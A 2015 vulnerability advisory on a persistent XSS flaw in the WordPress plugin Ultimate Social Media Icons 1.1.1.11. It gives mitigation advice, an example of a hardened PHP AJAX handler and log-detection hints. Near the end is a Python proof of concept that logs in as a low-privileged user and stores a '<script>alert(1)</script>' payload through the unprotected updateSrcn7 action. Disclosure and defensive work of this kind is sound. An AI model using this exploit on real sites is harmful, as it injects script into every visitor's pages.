Ultimate Social Media and Share Icons 1.1.1.11, Persistent XSS
The Ultimate Social Media Icons plugin exposes several AJAX methods to all registered users, regardless of user level (see ultimate-social-media-icons/libs/controllers/sfsi_buttons_controller.php). These methods update the plugin's settings that control how buttons and text are displayed on the site. By supplying a few specific parameters, any registered user can achieve a persistent XSS, and the injected payload is then rendered on every page of the site (including the plugin's settings screen in the administration panel).
Homepage
https://wordpress.org/plugins/ultimate-social-media-icons/
CVSS Score
4
CVSS Vector
(AV:N/AC:L/Au:S/C:N/I:P/A:N)
Attack Scope
remote
Authorization Required
Registered
Mitigation
Implement nonces and access control (via roles) to all sensitive AJAX methods. Sanitize user input to these methods.
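As an added illustration of the mitigation above (this is example code written for this advisory, not the plugin's own handler, which is not reproduced here), a hardened WordPress AJAX handler for the updateSrcn7 action. The request parameter names come from the PoC below; the option name sfsi_example_popup_settings, the nonce action string sfsi_example_settings_nonce, the script handle, the JavaScript file path and the set of allowed values for sfsi_Show_popupOn are assumptions.

```php
<?php
// Added example: a hardened handler for the updateSrcn7 AJAX action.
// Not the plugin's own code; option name, nonce action, script handle and
// the allowed value set for sfsi_Show_popupOn are assumptions.

// Register the handler for authenticated users only. There is deliberately no
// wp_ajax_nopriv_ variant, so anonymous visitors cannot reach it at all.
add_action( 'wp_ajax_updateSrcn7', 'sfsi_example_update_popup_settings' );

function sfsi_example_update_popup_settings() {
    // 1. Nonce check: rejects requests that did not originate from the plugin's
    //    own settings page, which also blocks CSRF against an administrator.
    check_ajax_referer( 'sfsi_example_settings_nonce', 'nonce' );

    // 2. Capability check: "registered" is not enough; only users who may
    //    manage options are allowed to change site-wide display settings.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient privileges' ), 403 );
    }

    // 3. Input validation: enumerated values are whitelisted, free text is
    //    sanitized. sanitize_text_field() strips tags, so a <script> payload
    //    never reaches the database in the first place.
    $allowed_show_on = array( 'everypage', 'homepage', 'none' ); // assumed value set
    $show_on = isset( $_POST['sfsi_Show_popupOn'] )
        ? sanitize_key( wp_unslash( $_POST['sfsi_Show_popupOn'] ) )
        : 'none';
    if ( ! in_array( $show_on, $allowed_show_on, true ) ) {
        wp_send_json_error( array( 'message' => 'Invalid value for sfsi_Show_popupOn' ), 400 );
    }

    $popup_text = isset( $_POST['sfsi_popup_text'] )
        ? sanitize_text_field( wp_unslash( $_POST['sfsi_popup_text'] ) )
        : '';
    $once = ! empty( $_POST['sfsi_Shown_popupOnceTime'] ) ? 1 : 0;

    update_option( 'sfsi_example_popup_settings', array(
        'text'    => $popup_text,
        'show_on' => $show_on,
        'once'    => $once,
    ) );

    wp_send_json_success();
}

// 4. Output escaping: even sanitized values are escaped at render time, so a
//    value stored before the fix (or via another code path) cannot execute.
function sfsi_example_render_popup() {
    $settings = get_option( 'sfsi_example_popup_settings', array() );
    if ( empty( $settings['text'] ) || 'none' === $settings['show_on'] ) {
        return;
    }
    printf( '<div class="sfsi-popup">%s</div>', esc_html( $settings['text'] ) );
}
add_action( 'wp_footer', 'sfsi_example_render_popup' );

// The settings page hands the nonce to the script that fires the AJAX call;
// the script file path is assumed.
function sfsi_example_enqueue_admin_script() {
    wp_enqueue_script(
        'sfsi-example-admin',
        plugin_dir_url( __FILE__ ) . 'js/admin-example.js',
        array( 'jquery' ),
        '1.0',
        true
    );
    wp_localize_script( 'sfsi-example-admin', 'sfsiExample', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'sfsi_example_settings_nonce' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'sfsi_example_enqueue_admin_script' );
```

With this handler in place the request in the PoC below fails at three independent points: check_ajax_referer() terminates the request because no valid nonce is present, the capability check rejects the low-privileged account even if a nonce were obtained, and sanitize_text_field() plus esc_html() strip and escape the markup even for a legitimate administrator. For detection, POST requests to wp-admin/admin-ajax.php with action=updateSrcn7 from accounts that cannot manage options are the signal to look for in web server or WordPress audit logs.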
Proof of Concept
The following PoC will result in an alert being presented on all pages of the site, including the settings screen for the plugin in the administration panel.
import requests

# Authenticate as a low-privileged registered user (test/test in this PoC).
s = requests.session()
target = 'http://localhost'
url = '%s/wp-login.php' % target
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In",
}
r = s.post(url, data=payload)

# Call the unprotected AJAX method; the stored value is rendered on every page.
url = '%s/wp-admin/admin-ajax.php' % target
payload = {
    "action": "updateSrcn7",
    "sfsi_popup_text": "<script>alert(1)</script>",
    "sfsi_Show_popupOn": "everypage",
    "sfsi_Shown_popupOnceTime": "",
}
r = s.post(url, data=payload)
Timeline
- 2015-05-15: Discovered
- 2015-05-15: Vendor notified
- 2015-05-15: Vendor responded
- 2015-05-23: Version 1.1.1.12 released – issue resolved
- 2015-05-30: Advisory released